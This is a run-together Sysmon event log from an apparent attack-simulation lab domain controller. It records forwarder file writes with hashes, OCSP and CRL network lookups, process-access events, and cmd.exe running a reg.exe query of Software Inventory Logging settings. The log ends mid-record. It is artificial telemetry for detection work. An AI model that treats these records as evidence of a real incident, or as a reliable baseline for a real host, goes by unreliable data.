23542300x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FA2997C748A12903B902DB4BA13A31B5,SHA256=B7E15E9BBFFAB09BC1D05F7EEC868A6865034BC1C0B75486B804D890B29094F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE79EFC4ECA9885F57D10B0229F4E1F5,SHA256=F09438DC46CEAF8260E148B329CCE5CAC51D3B97D7685BADCF4D461EACC12C5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C14C7F7EF4E5190AD9926D274E795681,SHA256=1998D7A8CB0081120B54BD052BBA01D6B616C9CEE96B21CFE6FB08E58C6351DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.502{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E21185358033116E48B29342A995EF74,SHA256=FD5A785B26E7A68B6096E323E54DF18EC1042EFA207177B487F23C2848B6B3C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:35.283{266CAFBE-646C-6064-1500-00000000AE01}13161696C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.604{266CAFBE-647D-6064-3400-00000000AE01}2760pki.intel.com0type: 5 certificates.intel.com.edgesuite.net;type: 5 a243.d.akamai.net;::ffff:184.25.50.179;::ffff:184.25.50.185;C:\Windows\sysmon64.exe 354300x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.768{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58082-false151.139.128.14-80http 354300x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.724{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63746- 354300x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.629{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58081-false151.139.128.14-80http 22542200x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.503{266CAFBE-647D-6064-3400-00000000AE01}2760ocsp.intel.com0type: 5 ocsp.comodoca.com;::ffff:151.139.128.14;C:\Windows\sysmon64.exe 354300x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.625{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63682- 354300x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.598{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58080-false184.25.50.179a184-25-50-179.deploy.static.akamaitechnologies.com80http 354300x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.591{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62503- 354300x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.498{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58079-false151.139.128.14-80http 354300x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.494{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62974- 
354300x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.482{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58078-false151.139.128.14-80http 354300x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.479{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55422- 23542300x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:37.971{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F286E52C3FAB5F26FE9F1C6B26544385,SHA256=64682E5C575BBFD0C6959871647125CFE17A92B63CCE100FBDFBA4FE3E2F39C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.277{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58085-false23.37.43.27a23-37-43-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.260{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58084-false23.37.43.27a23-37-43-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58483- 354300x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.228{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58083-false93.184.220.29-80http 354300x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.949{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57459- 23542300x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:37.127{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE79EFC4ECA9885F57D10B0229F4E1F5,SHA256=F09438DC46CEAF8260E148B329CCE5CAC51D3B97D7685BADCF4D461EACC12C5A,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.282{266CAFBE-647D-6064-3400-00000000AE01}2760sv.symcd.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.265{266CAFBE-647D-6064-3400-00000000AE01}2760s2.symcb.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.220{266CAFBE-647D-6064-3400-00000000AE01}2760sv.symcb.com0type: 5 
crl-symcprod.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 354300x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:37.106{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56180- 23542300x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:40.205{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=9122C454A375CA024465FF3ABE4787B4,SHA256=C2346D518E0E6BAAC4D14FD68318E8E544E5EF5C6F79ABC5579D43EC6A8C9B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:41.221{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=72254F55CF93AFBB1C6AABEF241CFE28,SHA256=00516D08AB5AA350731E72EFC6C058059A6E2D52510155D0CFC636B70156678C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:41.221{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2D294D857276DE30451BDB40A66349EC,SHA256=197E141F597DF4E503C977D6CF94C425BC680EAF2765EA6E7A72C23A8817C9BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:43.346{266CAFBE-648B-6064-7A00-00000000AE01}4692NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4EC7ADD60351DAF42239B37CA664EF4,SHA256=391BA49BC5DEE97EBEBD1F661C9B565F5A2F724231054851661FC7ADF2A54F95,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:44.767{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:44.424{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FB98456422EBDE6D12EBED7CD999FE7,SHA256=91543B4F7DC64804CCEFA52143F21F28990121763E1891625DF32031F2515F98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:45.580{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BDFB310ADB96C44FA7384D645C1D01,SHA256=CA6CE11541B4234453A4770444787D4587E570597A9194212EB9919BC7F1001F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.658{266CAFBE-64AA-6064-8B00-00000000AE01}2340NT 
AUTHORITY\SYSTEMC:\Windows\system32\cmd.exeC:\Windows\Temp\silconfig.logMD5=30F10BDF2397EE813AD110C4C67DA9C9,SHA256=AEDC0F097B888E0EB90F40157351396D418B7A8A82A2C69BD82FEB6DBD12BC83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-64AA-6064-8C00-00000000AE01}44163324C:\Windows\system32\conhost.exe{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-64AA-6064-8D00-00000000AE01}49484064C:\Windows\system32\cmd.exe{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.635{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT 